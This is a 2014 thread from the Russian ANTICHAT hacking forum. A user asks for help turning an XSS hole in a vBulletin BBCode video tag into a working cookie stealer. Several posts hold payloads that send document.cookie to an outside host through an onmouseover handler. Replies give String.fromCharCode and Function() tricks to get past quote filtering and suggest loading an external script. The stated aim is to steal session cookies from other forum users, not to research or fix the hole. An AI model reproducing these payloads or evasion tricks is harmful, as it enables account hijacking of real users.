ANTICHAT — форум по информационной безопасности, OSINT и технологиям
ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию.
Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club,
и теперь снова доступен на новом адресе —
forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
 |
|
10.02.2014, 14:56
|
|
Познающий
Регистрация: 29.05.2012
Сообщений: 34
Провел на форуме:
7076
Репутация:
0
|
|
Добрый день всем. Такой вопрос.
Есть xss на булке из за тега google*video.
[google*video][U*RL=/onmouseover=document.location.href = 'http://site.net/snf/s.gif?'+document.cookie;a="]1[/U*RL]123[/google*video]
Алерт с куками вылетает на ура, теперь вопрос.
Фильтруются кавычки ' " и `
Как быть в данной ситуации?
|
|
|
10.02.2014, 15:10
|
|
Новичок
Регистрация: 15.05.2010
Сообщений: 0
Провел на форуме:
2268
Репутация:
0
|
|
А в чем проблема?
Код:
eval(String.fromCharCode(84, 69, 83, 84))
// Фильтр на eval:
Function(String.fromCharCode(84, 69, 83, 84))()
|
|
|
|
10.02.2014, 15:55
|
|
Познающий
Регистрация: 29.05.2012
Сообщений: 34
Провел на форуме:
7076
Репутация:
0
|
|
Спасибо, а как с тегом прописать ? я что то не догоняю
|
|
|
|
10.02.2014, 18:00
|
|
Познающий
Регистрация: 29.05.2012
Сообщений: 34
Провел на форуме:
7076
Репутация:
0
|
|
Дайте encoder Хотябы(
|
|
|
|
10.02.2014, 19:05
|
|
Участник форума
Регистрация: 23.06.2013
Сообщений: 103
Провел на форуме:
23349
Репутация:
45
|
|
Сообщение от Seller Zeus
Seller Zeus said:
Дайте encoder Хотябы(
https://www.martineve.com/2007/05/23/string-fromcharcode-encoder/
|
|
|
|
10.02.2014, 19:31
|
|
Познающий
Регистрация: 29.05.2012
Сообщений: 34
Провел на форуме:
7076
Репутация:
0
|
|
Сообщение от Inoms
https://www.martineve.com/2007/05/23/string-fromcharcode-encoder/
Спасибо большое
|
|
|
|
10.02.2014, 20:14
|
|
Познающий
Регистрация: 29.05.2012
Сообщений: 34
Провел на форуме:
7076
Репутация:
0
|
|
Чет не получается.
Зашифровал это место:
Сообщение от None
document.location.href = 'http://site.net/snf/s.gif?'+document.cookie
Получилось:
Сообщение от None
eval(String.fromCharCode(102,117,110,99,116,105,11 1,110,32,101,110,99,111,100,101,95,116,111,95,106, 97,118,97,115,99,114,105,112,116,40,41,32,123,32,1 18,97,114,32,105,110,112,117,116,32,61,32,100,111, 99,117,109,101,110,116,46,103,101,116,69,108,101,1 09,101,110,116,66,121,73,100,40,39,105,110,112,117 ,116,116,101,120,116,39,41,46,118,97,108,117,101,5 9,32,118,97,114,32,111,117,116,112,117,116,32,61,3 2,39,101,118,97,108,40,83,116,114,105,110,103,46,1 02,114,111,109,67,104,97,114,67,111,100,101,40,39, 59,32,102,111,114,40,112,111,115,32,61,32,48,59,32 ,112,111,115,32,60,32,105,110,112,117,116,46,108,1 01,110,103,116,104,59,32,112,111,115,43,43,41,32,1 23,32,111,117,116,112,117,116,32,43,61,32,105,110, 112,117,116,46,99,104,97,114,67,111,100,101,65,116 ,40,112,111,115,41,59,32,105,102,40,112,111,115,32 ,33,61,32,40,105,110,112,117,116,46,108,101,110,10 3,116,104,32,45,32,49,41,41,32,123,32,111,117,116, 112,117,116,32,43,61,32,34,44,34,59,32,125,32,125, 32,111,117,116,112,117,116,32,43,61,32,39,41,41,39 ,59,32,100,111,99,117,109,101,110,116,46,103,101,1 16,69,108,101,109,101,110,116,66,121,73,100,40,39, 114,101,115,117,108,116,39,41,46,105,110,110,101,1 14,72,84,77,76,32,61,32,111,117,116,112,117,116,59 ,32,114,101,116,117,114,110,32,48,59,32,125))
Вставил:
Сообщение от None
[google*video][U*RL=/onmouseover=eval(String.fromCharCode(102,117,110,9 9,116,105,111,110,32,101,110,99,111,100,101,95,116 ,111,95,106,97,118,97,115,99,114,105,112,116,40,41 ,32,123,32,118,97,114,32,105,110,112,117,116,32,61 ,32,100,111,99,117,109,101,110,116,46,103,101,116, 69,108,101,109,101,110,116,66,121,73,100,40,39,105 ,110,112,117,116,116,101,120,116,39,41,46,118,97,1 08,117,101,59,32,118,97,114,32,111,117,116,112,117 ,116,32,61,32,39,101,118,97,108,40,83,116,114,105, 110,103,46,102,114,111,109,67,104,97,114,67,111,10 0,101,40,39,59,32,102,111,114,40,112,111,115,32,61 ,32,48,59,32,112,111,115,32,60,32,105,110,112,117, 116,46,108,101,110,103,116,104,59,32,112,111,115,4 3,43,41,32,123,32,111,117,116,112,117,116,32,43,61 ,32,105,110,112,117,116,46,99,104,97,114,67,111,10 0,101,65,116,40,112,111,115,41,59,32,105,102,40,11 2,111,115,32,33,61,32,40,105,110,112,117,116,46,10 8,101,110,103,116,104,32,45,32,49,41,41,32,123,32, 111,117,116,112,117,116,32,43,61,32,34,44,34,59,32 ,125,32,125,32,111,117,116,112,117,116,32,43,61,32 ,39,41,41,39,59,32,100,111,99,117,109,101,110,116, 46,103,101,116,69,108,101,109,101,110,116,66,121,7 3,100,40,39,114,101,115,117,108,116,39,41,46,105,1 10,110,101,114,72,84,77,76,32,61,32,111,117,116,11 2,117,116,59,32,114,101,116,117,114,110,32,48,59,3 2,125));a="]1[/U*RL]123[/goole*video]
Но не работает, почему?
Подскажите плиз |
|
|
|
11.02.2014, 11:53
|
|
Познающий
Регистрация: 29.05.2012
Сообщений: 34
Провел на форуме:
7076
Репутация:
0
|
|
Где я ошибся?
|
|
|
|
11.02.2014, 14:13
|
|
Познающий
Регистрация: 29.05.2012
Сообщений: 34
Провел на форуме:
7076
Репутация:
0
|
|
Такой код:
Сообщение от None
[g*ooglevideo][UR*L=/onmouseover=String.fromCharCode(105,109,103,61,110 ,101,119,32,73,109,97,103,101,40,41,59,105,109,103 ,46,115,114,99,61,39,104,116,116,112,58,47,47,107, 114,105,114,109,105,110,97,108,97,46,110,101,116,4 7,115,110,102,47,115,46,103,105,102,63,39)+documen t.cookie;a="]1[/UR*L]123[/g*ooglevideo]
Открывает пустую страницу с таким содержимым:
Сообщение от None
img=new Image();img.src='http://site.net/snf/s.gif?'ibPAcookiecheck=yesss; bblastvisit=1391747746; bblastactivity=0; bbforum_view=f6e2fa0437c99cf04b4bc96c8e0bd82378a10 a68a-1-%7Bi-13_i-1392013111_%7D
Как надо написать правильно чтобы он все же создавал картинку?
Img запишнул в str так как пробелы тоже не допускаются, а переменная создается только с пробелом. |
|
|
|
11.02.2014, 16:51
|
|
Постоянный
Регистрация: 22.11.2010
Сообщений: 545
Провел на форуме:
182660
Репутация:
324
|
|
попробуй кормить скрипту ссылку на js файл в котором и будет нужный код
|
|
|
|
|
|
|
|
Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
|
|
|
|
Линейный вид
